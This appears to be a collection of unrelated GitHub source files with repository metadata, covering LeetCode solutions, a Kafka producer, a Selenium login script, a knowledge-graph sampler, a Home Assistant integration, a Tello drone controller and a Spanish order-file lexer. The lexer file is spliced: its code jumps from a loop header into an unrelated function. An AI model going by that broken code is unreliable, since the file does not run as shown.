metaclass=PayloadMeta):\n    NAME: str = 'base'\n    SIGN: str\n\n    __args__: Tuple\n    __kwargs__: Dict\n\n    def __new__(cls, *args, **kwargs) -> Any:\n        inst = object.__new__(cls)\n        inst.__args__ = args\n        inst.__kwargs__ = kwargs\n        return inst\n\n\nclass IgnoreObjectPayload(\n    BasePayload,\n    # metaclass=PayloadMeta\n):\n    NAME = 'object'\n\n    def __init__(self, obj):\n        self.repr = repr(obj)\n\n\nclass OtherPayload(\n    BasePayload,\n    # metaclass=PayloadMeta\n):\n    NAME = 'other'\n\n    def __init__(self, o):\n        pass\n\n\ndef get_payload_by_sign(sign):\n    return _SIGN_PAYLOAD.get(sign)\n\n\ndef get_payload_by_name(name):\n    return _NAME_PAYLOAD.get(name)","repo_name":"ZSAIm/VideoCrawlerEngine","sub_path":"helper/payload/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":420,"dataset":"github-code","pt":"6"} +{"seq_id":"8338721754","text":"import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nimport numpy as np\n\ndef readData():\n\n    data = pd.read_csv('data/criteo_sample.txt')\n    sparse_features = ['C' + str(i) for i in range(1, 27)] #categorical features\n    dense_features = ['I'+str(i) for i in range(1, 14)] #continuous features\n\n    data[sparse_features] = data[sparse_features].fillna('-1')\n    data[dense_features] = data[dense_features].fillna(0)\n\n    #integer-encode the categorical features\n    for feat in sparse_features:\n        lbe = LabelEncoder()\n        data[feat] = lbe.fit_transform(data[feat])\n\n    labels = data['label']\n    X = data[sparse_features+dense_features]\n\n    #X=data[sparse_features]\n    return np.array(X),np.array(labels)\n\n\nif __name__ == '__main__':\n    print(readData())\n","repo_name":"rexrex9/DeepFM_tf2","sub_path":"readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"40966853532","text":"#\n# @lc app=leetcode id=74 lang=python3\n#\n# [74] Search a 2D Matrix\n#\n\n# @lc code=start\nclass Solution:\n    def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n        for row in range(len(matrix)):\n            if self.binary_search(matrix[row], target, 0, len(matrix[row])-1):\n                return True\n        else:\n            return False\n    \n    def binary_search(self, list, target, start, end):\n        if start > end:\n            return False\n        mid = start + (end - start) // 2\n        if target == list[mid]: return True\n        elif target > list[mid]: return self.binary_search(list, target, mid + 1, end)\n        else: return self.binary_search(list, target, start, mid - 1)\n\n\n# Notes (6/13/2023)\n# Run a binary search on each of the rows to check if a number exists \n\n# time complexity - O(m * log n)\n\n# Improved solution:\n# Run a binary search to figure out which row could contain a target, and \n# run a binary search again to see if a target exists in that row\n\n# time complexity - O(log m * log n)\n    \n# @lc code=end\n\n","repo_name":"saki-imai-1204/leetcode","sub_path":"code/74.search-a-2-d-matrix.py","file_name":"74.search-a-2-d-matrix.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14472085783","text":"'''\nGiven three integers x, y, and bound, return a list of all the powerful integers that have a value less than or equal to bound.\n\nAn integer is powerful if it can be represented as x^i + y^j for some integers i >= 0 and j >= 0.\n\nYou may return the answer in any order. 
In your answer, each value should occur at most once.\n\n \n\nExample 1:\n\nInput: x = 2, y = 3, bound = 10\nOutput: [2,3,4,5,7,9,10]\nExplanation:\n2 = 2^0 + 3^0\n3 = 2^1 + 3^0\n4 = 2^0 + 3^1\n5 = 2^1 + 3^1\n7 = 2^2 + 3^1\n9 = 2^3 + 3^0\n10 = 2^0 + 3^2\nExample 2:\n\nInput: x = 3, y = 5, bound = 15\nOutput: [2,4,6,8,10,14]\n \n\nConstraints:\n\n1 <= x, y <= 100\n0 <= bound <= 10^6\n'''\n\n# imports added so the snippet runs outside the LeetCode environment\nfrom math import log\nfrom typing import List\n\nclass Solution:\n def powerfulIntegers(self, x: int, y: int, bound: int) -> List[int]:\n a = bound if x == 1 else int(log(bound, x))\n b = bound if y == 1 else int(log(bound, y))\n \n powerful_integers = set()\n \n for i in range(a+1):\n for j in range(b+1):\n value = x**i + y**j\n if value <= bound:\n powerful_integers.add(value)\n if y == 1:\n break\n \n if x == 1:\n break\n \n return list(powerful_integers)\n \n","repo_name":"loganyu/leetcode","sub_path":"problems/970_powerful_integers.py","file_name":"970_powerful_integers.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"16402806494","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\nimport ssl\nimport socket\nfrom kafka import KafkaProducer\nfrom kafka.errors import KafkaError\nfrom thinkutils.config.Config import *\nfrom thinkutils.log.log import g_logger\nimport os\n\nclass ThinkKafkaProducer(object):\n\n g_kafkaContext = None\n g_producer = None\n\n @classmethod\n def init(cls):\n cls.g_producer = KafkaProducer(bootstrap_servers=g_config.get(\"kafka_mq\", \"bootstrap_servers\"))\n\n @classmethod\n def send(cls, szTopic, szKey, szMsg):\n g_logger.debug(\"FXXK\")\n try:\n g_logger.debug(\"%s\" % (szMsg, ))\n partitions = cls.g_producer.partitions_for(szTopic)\n g_logger.debug('Partitions for topic: %s' % (partitions, ))\n future = cls.g_producer.send(szTopic, szMsg, key=szKey)\n future.get()\n # g_logger.debug('send message success.')\n except KafkaError as e:\n g_logger.error('send message failed. %s' % e.message)\n","repo_name":"ThinkmanWang/P3Demo","sub_path":"thinkutils/kafkamq/ThinkKafkaProducer.py","file_name":"ThinkKafkaProducer.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"26048180671","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nimport os\nimport random\n\nurl = 'https://evermos.com/home/' \ntab_url = 'https://www.google.com' \ndirpath = os.getcwd()\nchrome_dir = \"{}/chromedriver\".format(dirpath)\ndriver = webdriver.Chrome(executable_path =chrome_dir)\ndriver.maximize_window()\ndriver.get(url)\ntime.sleep(5)\nnotss = driver.find_elements_by_class_name(\"masuk\")\nnotss[0].click()\ntime.sleep(5)\ntelp = driver.find_elements_by_class_name(\"inputText__input\")\ntelp[0].send_keys('621223334444')\ntelp[1].send_keys('password')\nlogin = driver.find_elements_by_class_name(\"btn--large\")\nlogin[0].click()\ntime.sleep(5)\nhome = driver.find_elements_by_class_name(\"appNav__item\")\nhome[2].click()\ntime.sleep(5)\nsalin = driver.find_elements_by_class_name(\"storeFront__option\")\nsalin[2].click()\ntime.sleep(5)\ndriver.execute_script(\"alert('Terimakasih. 
Semoga berkenan')\")\ntime.sleep(5)\nalert = driver.switch_to.alert\nalert.accept()\nprint('Good bye')\ndriver.close()\n","repo_name":"nisaichul/evermos","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32968286069","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Schlichtkrull Sampler Class.\"\"\"\n\nimport logging\nfrom typing import Optional, Tuple\n\nimport torch\nfrom torch.utils.data.sampler import Sampler\n\nfrom ..triples import TriplesFactory\n\n\ndef _compute_compressed_adjacency_list(\n triples_factory: TriplesFactory,\n) -> Tuple[torch.LongTensor, torch.LongTensor, torch.LongTensor]:\n \"\"\"Compute compressed undirected adjacency list representation for efficient sampling.\n\n The compressed adjacency list format is inspired by CSR sparse matrix format.\n\n :param triples_factory: The triples factory.\n :return: a tuple (degrees, offsets, compressed_adj_lists)\n where\n degrees: shape: (num_entities,)\n offsets: shape: (num_entities,)\n compressed_adj_list: shape: (2*num_triples, 2)\n with\n adj_list[i] = compressed_adj_list[offsets[i]:offsets[i+1]]\n \"\"\"\n adj_lists = [[] for _ in range(triples_factory.num_entities)]\n for i, (s, _, o) in enumerate(triples_factory.mapped_triples):\n adj_lists[s].append([i, o.item()])\n adj_lists[o].append([i, s.item()])\n degrees = torch.tensor([len(a) for a in adj_lists], dtype=torch.long)\n assert torch.sum(degrees) == 2 * triples_factory.num_triples\n\n offset = torch.empty(triples_factory.num_entities, dtype=torch.long)\n offset[0] = 0\n offset[1:] = torch.cumsum(degrees, dim=0)[:-1]\n compressed_adj_lists = torch.cat([torch.as_tensor(adj_list, dtype=torch.long) for adj_list in adj_lists], dim=0)\n return degrees, offset, compressed_adj_lists\n\n\nclass GraphSampler(Sampler):\n r\"\"\"Samples edges based on the proposed method in Schlichtkrull et al.\n\n .. seealso::\n\n https://github.com/MichSchli/RelationPrediction/blob/2560e4ea7ccae5cb4f877ac7cb1dc3924f553827/code/train.py#L161-L247\n \"\"\"\n\n def __init__(\n self,\n triples_factory: TriplesFactory,\n num_samples: Optional[int] = None,\n ):\n mapped_triples = triples_factory.mapped_triples\n super().__init__(data_source=mapped_triples)\n self.triples_factory = triples_factory\n\n if num_samples is None:\n num_samples = triples_factory.num_triples // 10\n logging.info(f'Did not specify number of samples. 
Using {num_samples}.')\n elif num_samples > triples_factory.num_triples:\n raise ValueError('num_samples cannot be larger than the number of triples, but '\n f'{num_samples} > {triples_factory.num_triples}.')\n if not isinstance(num_samples, int) or num_samples <= 0:\n raise ValueError(\"num_samples should be a positive integer \"\n \"value, but got num_samples={}\".format(num_samples))\n self.num_samples = num_samples\n self.num_batches_per_epoch = triples_factory.num_triples // self.num_samples\n\n # preprocessing\n self.degrees, self.offset, self.neighbors = _compute_compressed_adjacency_list(triples_factory=triples_factory)\n\n def __iter__(self): # noqa: D105\n # initialize\n chosen_edges = torch.empty(self.num_samples, dtype=torch.long)\n node_weights = self.degrees.detach().clone()\n edge_picked = torch.zeros(self.triples_factory.num_triples, dtype=torch.bool)\n node_picked = torch.zeros(self.triples_factory.num_entities, dtype=torch.bool)\n\n # sample iteratively\n for i in range(0, self.num_samples):\n # determine weights\n weights = node_weights * node_picked\n\n # only happens at first iteration\n if torch.sum(weights) == 0:\n weights = torch.ones_like(weights)\n weights[node_weights == 0] = 0\n assert i == 0\n else:\n assert i > 0\n\n # normalize to probabilities\n probabilities = weights.float() / weights.sum().float()\n\n # sample a start node\n chosen_vertex = torch.multinomial(probabilities, num_samples=1)[0]\n node_picked[chosen_vertex] = True\n\n # get list of neighbors\n start = self.offset[chosen_vertex]\n chosen_node_degree = self.degrees[chosen_vertex]\n stop = start + chosen_node_degree\n adj_list = self.neighbors[start:stop, :]\n\n # sample an outgoing edge at random which has not been chosen yet using rejection sampling\n chosen_edge_index = torch.randint(chosen_node_degree, size=(1,))[0]\n chosen_edge = adj_list[chosen_edge_index]\n edge_number = chosen_edge[0]\n while edge_picked[edge_number]:\n chosen_edge_index = torch.randint(chosen_node_degree, size=(1,))[0]\n chosen_edge = adj_list[chosen_edge_index]\n edge_number = chosen_edge[0]\n chosen_edges[i] = edge_number\n edge_picked[edge_number] = True\n\n # visit target node\n other_vertex = chosen_edge[1]\n node_picked[other_vertex] = True\n\n # decrease sample counts\n node_weights[chosen_vertex] -= 1\n node_weights[other_vertex] -= 1\n\n # return chosen edges\n return iter(chosen_edges)\n\n def __len__(self): # noqa: D105\n return self.num_batches_per_epoch\n","repo_name":"MindRank-Biotech/PharmKG","sub_path":"model/pykeen/pykeen/src/pykeen/training/schlichtkrull_sampler.py","file_name":"schlichtkrull_sampler.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"47"} +{"seq_id":"7865133525","text":"\"\"\"The ONYX.CENTER integration.\"\"\"\nimport asyncio\nimport logging\nfrom datetime import timedelta\n\nimport voluptuous as vol\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import (\n CONF_ACCESS_TOKEN,\n CONF_SCAN_INTERVAL,\n CONF_FORCE_UPDATE,\n EVENT_HOMEASSISTANT_STOP,\n)\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers import config_validation as cv\nfrom homeassistant.helpers.debounce import Debouncer\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator\n\nfrom .api_connector import APIConnector\nfrom .const import (\n CONF_FINGERPRINT,\n DOMAIN,\n ONYX_API,\n ONYX_COORDINATOR,\n ONYX_TIMEZONE,\n)\n\n_LOGGER = 
logging.getLogger(__name__)\n\nONYX_SCHEMA = vol.Schema(\n vol.All(\n {\n vol.Required(CONF_FINGERPRINT): cv.string,\n vol.Required(CONF_ACCESS_TOKEN): cv.string,\n vol.Required(CONF_SCAN_INTERVAL): cv.positive_int,\n vol.Required(CONF_FORCE_UPDATE, default=False): cv.boolean,\n },\n )\n)\n\nCONFIG_SCHEMA = vol.Schema(\n {DOMAIN: vol.Schema(vol.All(cv.ensure_list, [ONYX_SCHEMA]))},\n extra=vol.ALLOW_EXTRA,\n)\n\nPLATFORMS = [\n \"cover\",\n \"sensor\",\n]\n\n\nasync def async_setup(hass: HomeAssistant, config: dict):\n \"\"\"Set up ONYX component via configuration.yaml.\"\"\"\n hass.data.setdefault(DOMAIN, {})\n return True\n\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):\n \"\"\"Set up ONYX from a config entry.\"\"\"\n hass.data.setdefault(DOMAIN, {})\n\n fingerprint = entry.data[CONF_FINGERPRINT]\n token = entry.data[CONF_ACCESS_TOKEN]\n scan_interval = entry.data[CONF_SCAN_INTERVAL]\n force_update = entry.data.get(CONF_FORCE_UPDATE, False)\n\n _LOGGER.debug(\"setting up %s integration with fingerprint %s\", DOMAIN, fingerprint)\n if force_update:\n _LOGGER.warning(\n \"Disabling partial updates. \"\n \"This may lead to a higher amount of API calls to Hella, \"\n \"and performance impacts. It is advised to not enable this option.\"\n )\n\n onyx_api = APIConnector(hass, fingerprint, token)\n await onyx_api.update()\n onyx_timezone = await onyx_api.get_timezone()\n\n coordinator = DataUpdateCoordinator(\n hass,\n _LOGGER,\n name=\"ONYX\",\n update_method=onyx_api.update,\n update_interval=timedelta(minutes=scan_interval),\n request_refresh_debouncer=Debouncer(hass, _LOGGER, cooldown=0, immediate=True),\n )\n\n def updated_device(device):\n onyx_api.updated_device(device)\n coordinator.async_set_updated_data(device)\n\n hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, onyx_api.stop)\n onyx_api.set_event_callback(updated_device)\n onyx_api.start(force_update)\n\n hass.data[DOMAIN][entry.entry_id] = {\n ONYX_API: onyx_api,\n ONYX_TIMEZONE: onyx_timezone,\n ONYX_COORDINATOR: coordinator,\n }\n\n for platform in PLATFORMS:\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(entry, platform),\n )\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):\n \"\"\"Unload a config entry.\"\"\"\n unload_ok = all(\n await asyncio.gather(\n *[\n hass.config_entries.async_forward_entry_unload(entry, platform)\n for platform in PLATFORMS\n ]\n )\n )\n if unload_ok:\n hass.data[DOMAIN].pop(entry.entry_id)\n\n return unload_ok\n","repo_name":"muhlba91/onyx-homeassistant-integration","sub_path":"custom_components/hella_onyx/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"11290955982","text":"\"\"\"\nThis module tends to allow user to take control of a TelloEDU drone\n\nThe _end_connection flag is raised when the ack is bad or when the drone is unreachable\n\"\"\"\n\nimport sys\nimport socket\nfrom time import sleep\nfrom PIL import Image\n\nfrom abstract_drone import AbstractDrone, AV_AVAILABLE, LIB_AVAILABLE\n\nclass TelloEDU(AbstractDrone):\n \"\"\"Class created to interact with the drone\"\"\"\n def __init__(self, tello_address=None, **kwargs):\n #Init the Abstract base class\n super().__init__(**kwargs)\n\n #If address isn't given\n if tello_address is None:\n connected_drones = self.get_all_drones()\n # print(connected_drones)\n if connected_drones == []:\n sys.tracebacklimit = 
0\n raise InterruptedError('You are not connected to any drone')\n tello_address = connected_drones[0]\n # print('The connected Tello is the Tello with IP : ' + tello_address)\n\n self.tello_address = (tello_address, 8889)\n self._end_connection = self.test_drone_connection()\n if self.is_connected:\n print(self)\n self.init_drone_sockets()\n self.init_commands()\n\n def __repr__(self):\n return f'\\nI am a Tello EDU drone, my IP@ is {self.tello_address[0]}\\n'\n\n def __len__(self):\n return int(self.is_connected)\n\n def init_commands(self):\n \"\"\"Init drone SDK\"\"\"\n self.send('command')\n #Enable video streaming\n if self.video_stream:\n self.send('streamon')\n\n def test_drone_connection(self):\n \"\"\"\n Test if the drone is still connected\n Return True if the connection should end\n \"\"\"\n connected = self.still_connected(self.tello_address[0])\n if not connected:\n print('Drone is not reachable')\n return not connected\n\n def send(self, message, index: int = 0):\n \"\"\"Send message to drone using UDP Socket\"\"\"\n try:\n self.command_socket.sendto(message.encode(), self.tello_address)\n except (OSError, IndexError):\n self._end_connection = True\n print(f'{index}-Socket has already been closed')\n else:\n print(f'Drone {index} - Sending message: {message}')\n self.all_instructions.append(str(index) + '-' + message)\n finally:\n self.end_connection = self.test_drone_connection()\n\n def receive_ack(self):\n \"\"\"Use UDP socket to receive ack from each command we sended\"\"\"\n while self.is_connected:\n try:\n response, _ = self.command_socket.recvfrom(2048)\n print(f'Received message : {response.decode(\"utf-8\", \"ignore\")}')\n except (socket.timeout, ConnectionResetError, OSError):\n self._end_connection = True\n print('Drone is not reachable anymore')\n # print('ack thread done')\n\n def receive_state(self, parameters):\n \"\"\"Use UDP socket to receive all infos from the state channel\"\"\"\n sleep(2)\n while self.is_connected:\n try:\n last_state, _ = self.state_socket.recvfrom(2048)\n parameters = last_state.decode().split(';')[:-1]\n print(f'0-parameters : {parameters}')\n sleep(3)\n except Exception as exc:\n print(f'Error receiving: {exc}')\n print('Drone is not reachable anymore')\n\n def receive_frame(self):\n \"\"\"\n Use UDP socket to receive the video stream\n The video stream can only be used when you are directly connected to the drone WIFI (manufacturer restrictions)\n \"\"\"\n print('If you are not directly connected to drone Wifi, Video Stream is impossible')\n all_data = b''\n sleep(4)\n while self.is_connected:\n try:\n rcv_bytes, _ = self.videostream_socket.recvfrom(2048)\n\n all_data += rcv_bytes\n self.video_frames.add_data(rcv_bytes)\n\n # If it's the ending frame of a picture\n if len(rcv_bytes) != 1460:\n if LIB_AVAILABLE:\n ## IMAGE PROCESSING | Input = h264\n for frame in self.process_frame(all_data):\n picture = Image.fromarray(frame)\n self.last_frame = picture\n if AV_AVAILABLE:\n ## IMAGE PROCESSING | Input = h264\n for frame in self.process_frame():\n picture = Image.fromarray(frame)\n self.last_frame = picture\n all_data = b''\n\n except KeyboardInterrupt as exc:\n print(exc)\n except OSError:\n pass\n print('frame thread done')\n\nif __name__ == '__main__':\n my_tello = TelloEDU(video_stream=True, state_listener=False, back_to_base=False)\n\n # my_tello.init_flight_mode('act from file', filename='mission_file_idle.txt')\n # my_tello.init_flight_mode('picture mission', object_distance=(0, 100), object_dim=(40, 40, 20))\n 
my_tello.init_flight_mode('open pipe')\n # my_tello.init_flight_mode('reactive')\n my_tello.start_mission()\n","repo_name":"s-rigaud/pyTelloSDK","sub_path":"tello_edu.py","file_name":"tello_edu.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"846934138","text":"'''\n429. N-ary Tree Level Order Traversal\nGiven an n-ary tree, return the level order traversal of its nodes' values. (ie, \nfrom left to right, level by level).\n\nNote:\nThe depth of the tree is at most 1000.\nThe total number of nodes is at most 5000.\n'''\n\n'''\nALGORITHM:\nSame approach as Level order traversal for Binary Tree. \n\nRUNTIME COMPLEXITY : O(N)\nSPACE COMPLEXITY: O(N)\n'''\n\n\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\"\"\"\nfrom collections import deque\n\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: Node\n :rtype: List[List[int]]\n \"\"\" \n if root == None:\n return []\n q = deque()\n res = []\n tmp = []\n q.extend([root, \"#\"])\n while len(q) > 1:\n node = q.popleft()\n if node == \"#\":\n q.append(\"#\")\n res.append(tmp)\n tmp = []\n else:\n tmp.append(node.val)\n if node.children:\n for c in node.children:\n q.append(c) \n res.append(tmp)\n return res \n\n\n","repo_name":"renukadeshmukh/Leetcode_Solutions","sub_path":"429_NaryTreeLevelOrderTraversal.py","file_name":"429_NaryTreeLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"73652692942","text":"\"\"\"Anthony Tran\r\nPSID: 1957342\r\nZyLab 5.22\"\"\"\r\n\r\nprint(\"Davy's auto shop services\\nOil change -- $35\\nTire rotation -- $19\\nCar wash -- $7\\nCar wax -- $12\\n\")\r\nprint('Select first service:')\r\nfirst = input('')\r\nprint('Select second service:')\r\nsecond = input('')\r\n\r\nserv1 = ''\r\ncost = 0\r\nif first == 'Oil change':\r\n cost = 35\r\n serv1 = 'Service 1: Oil change, $35'\r\nelif first == 'Tire rotation':\r\n cost = 19\r\n serv1 = 'Service 1: Tire rotation, $19'\r\nelif first == 'Car wash':\r\n cost = 7\r\n serv1 = 'Service 1: Car wash, $7'\r\nelif first == 'Car wax':\r\n cost = 12\r\n serv1 = 'Service 1: Car wax, $12'\r\nelse:\r\n serv1 = 'Service 1: No service'\r\n\r\nserv2 = ''\r\ncost2 = 0\r\nif second == 'Oil change':\r\n cost2 = 35\r\n serv2 = 'Service 2: Oil change, $35'\r\nelif second == 'Tire rotation':\r\n cost2 = 19\r\n serv2 = 'Service 2: Tire rotation, $19'\r\nelif second == 'Car wash':\r\n cost2 = 7\r\n serv2 = 'Service 2: Car wash, $7'\r\nelif second == 'Car wax':\r\n cost2 = 12\r\n serv2 = 'Service 2: Car wax, $12'\r\nelse:\r\n serv2 = 'Service 2: No service'\r\n\r\nprint(\"\\nDavy's auto shop invoice\\n\")\r\nprint(serv1)\r\nprint(serv2)\r\n\r\nprint('\\nTotal: ', '$', (cost + cost2), sep='')\r\n","repo_name":"altran28/2344-1st","sub_path":"Homework1/ZyLab_5_22.py","file_name":"ZyLab_5_22.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22872699929","text":"#https://leetcode.com/problems/swap-nodes-in-pairs/description/\n#time O(N), space O(1)\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapPairs(self, head: Optional[ListNode]) -> 
Optional[ListNode]:\n dummyHead = ListNode(-1,head)\n prev = dummyHead\n cur = head\n while cur and cur.next:\n node1 = cur\n node2 = cur.next\n next = node2.next\n prev.next = node2\n node2.next = node1\n node1.next = next\n prev = node1\n cur = next\n return dummyHead.next\n\n","repo_name":"SitongChe/LeetCode","sub_path":"LinkedList/_24SwapNodesinPairs.py","file_name":"_24SwapNodesinPairs.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7441706007","text":"from string import ascii_letters\n\n\ndef all_anagrams(string: str):\n \"\"\"\n For given string s, find all possible anagrams\n :param string: str -> string s for finding anagrams\n :return: list of possible anagrams\n \"\"\"\n ls = string.split(\" \")\n dic = {}\n for word in ls:\n s = \"\".join(sorted(word))\n if s not in dic:\n dic[s] = [word]\n else:\n dic[s].append(word)\n answer = [dic[word] for word in dic if len(dic[word]) >= 2]\n return answer\n\n\ndef levenshtein(string_a: str, string_b: str) -> int:\n \"\"\"\n Given two strings string_a and string_b how many operations are required to convert string_b to string_a\n Available operations - Insertion, deletion and substitution\n \"\"\"\n length_a = len(string_a)\n length_b = len(string_b)\n\n table = [[i + j for j in range(length_b + 1)] for i in range(length_a + 1)]\n for i in range(length_a):\n for j in range(length_b):\n table[i + 1][j + 1] = min(table[i][j + 1] + 1,\n table[i + 1][j] + 1,\n table[i][j] + int(string_a[i] != string_b[j]))\n return table[length_a][length_b]\n\n\nif __name__ == \"__main__\":\n print(all_anagrams(\"ramo mora lex xsl sxl\"))\n","repo_name":"patel-dhairya/Python-Algo","sub_path":"StringAlgos.py","file_name":"StringAlgos.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72774306704","text":"from Clases.Datos import datos, error\nfrom Clases.DatosOrden import dtCabecera, dtOrden\nimport re\n\nclass AnalizarOrden:\n def __init__(self, ruta,opciones):\n self.ruta=ruta\n self.Linea=1\n self.texto=\"\"\n self.g=0\n self.ListaTokens=[]\n self.ListaErrores=[]\n self.opciones=opciones\n self.header=None\n self.ListaOrden=[]\n self.leerArchivo()\n\n\n def leerArchivo(self):\n archivo=open(self.ruta,'r', encoding='utf8')\n for linea in archivo:\n self.texto+=linea\n if linea!=\"\\n\":\n self.g+=1\n archivo.close() \n self.texto+=\"\\n\"\n self.analizar()\n \n def analizar(self):\n estado=0\n posicion=0\n columna=1\n string=\"\"\n cant=0\n noIdentificados=\"~!@#$%^&*()_+-|;\\/¿¡?{[}]´.\"\n noIdentificados2=\"~!@#$%^&*()+-|;\\/¿¡?{[}]´.\"\n cliente=\"\"\n nit=\"\"\n direccion=\"\"\n cont=0\n longitud=len(self.texto)\n while posicion2:\n aux=float(txt)\n redondeado = round(aux, 2)\n if aux<=100:\n return str(redondeado)\n else:\n return \"Formato inválido, la propina debe ser menor al 100%\"\n elif len(cadena[1])==2:\n aux=float(txt)\n if aux<=100:\n return txt\n else:\n return \"Formato inválido, la propina debe ser menor al 100%\"\n elif len(cadena[1])==1:\n aux=float(txt)\n if aux<=100:\n return txt\n else:\n return \"Formato inválido, la propina debe ser menor al 100%\"\n else:\n return \"Formato inválido, se esperaba digitos despues del punto\"\n\n elif cont>1:\n return \"Formato inválido, contiene mas dos puntos\"\n\n elif cont==0:\n if txt.isdigit():\n aux=float(txt)\n if aux<=100:\n return txt\n else:\n return \"Formato inválido, la propina 
debe ser menor al 100%\"\n else:\n return \"Formato inválido, no son digitos\"\n\n def getListaTokens(self):\n return self.ListaTokens\n \n def getListaErrores(self):\n return self.ListaErrores\n\n def getCabeceras(self):\n return self.header\n\n def getOrden(self):\n return self.ListaOrden\n\n #print(self.contLinea, self.reservada, self.cadena, self.opciones, self.error)\n'''\na=AnalizarOrden(\"Archivos_Prueba\\Orden.txt\",\"as\")\na.imprimirTokens()\na.imprimirErrores()\n'''\n","repo_name":"DanielDubonDR/LFP-Proyecto1_201901772","sub_path":"ProcesarOrden.py","file_name":"ProcesarOrden.py","file_ext":"py","file_size_in_byte":13891,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"39862274494","text":"from collections import deque\n\nn = int(input())\nG = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n a, b = map(int, input().split())\n G[a].append(b)\n G[b].append(a)\n\n\ndef dfs(start):\n queue = deque([(start, True)])\n visited = [False] * (n + 1)\n a_half = []\n b_half = []\n while queue:\n node, b = queue.pop()\n visited[node] = True\n if b:\n a_half.append(node)\n else:\n b_half.append(node)\n for adj in G[node]:\n if not visited[adj]:\n queue.append((adj, not b))\n return a_half, b_half\n\n\na_half, b_half = dfs(1)\nif len(a_half) >= n // 2:\n ans = a_half\nelse:\n ans = b_half\nprint(*ans[: n // 2], sep=' ')\n","repo_name":"yutake27/Atcoder","sub_path":"typical90/026/026.py","file_name":"026.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"32968286069","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 27 21:18:29 2016\n\n@author: Jonas\n\"\"\"\n\n\"\"\"\nIn this file we create a mongodb database and collections for the Pitchfork\nreview!\n\"\"\"\n\n\nimport pymongo  # the module itself is needed so pymongo.ASCENDING resolves below\nfrom pymongo import MongoClient\n\nconn = MongoClient()\npitchfork = conn.pitchfork\nreviews = pitchfork.review\nreviews.create_index([('itemPages', pymongo.ASCENDING)],unique=True)\n\n","repo_name":"JonasMoss/Pitchfork-scraping","sub_path":"pitchfork_mongo_db_creator.py","file_name":"pitchfork_mongo_db_creator.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"5562614432","text":"import sys\nfrom os.path import dirname, join\nsys.path.append(join(dirname(__file__),\"..\"))\nimport unittest\nimport app\nimport unittest.mock as mock\nfrom app import bot_response_api\nfrom app import *\nfrom app import db\nimport json \n\n\n\nKEY_INPUT = \"input\"\nKEY_EXPECTED = \"expected\"\nKEY_LENGTH = \"length\"\nKEY_FIRST_WORD = \"first_word\"\nKEY_SECOND_WORD = \"second_word\"\n\n\nclass MockResponse:\n def __init__(self, json_data, status_code):\n self.json_data = json_data\n self.status_code = status_code\n\n def json(self):\n return self.json_data\n\n\nclass ChatbotTestCase(unittest.TestCase):\n def setUp(self):\n self.success_test_funtranslate = [\n {\n KEY_INPUT: \"!! funtranslate Master Obiwan has lost a planet.\",\n KEY_EXPECTED: \"Lost a planet, master obiwan has.\"\n },\n \n ]\n self.failure_test_funtranslate = [\n {\n KEY_INPUT: \"!! funtranslate Master Obiwan has lost a planet.\",\n KEY_EXPECTED: \"Error: Translate limit hit: try in an hour\" \n 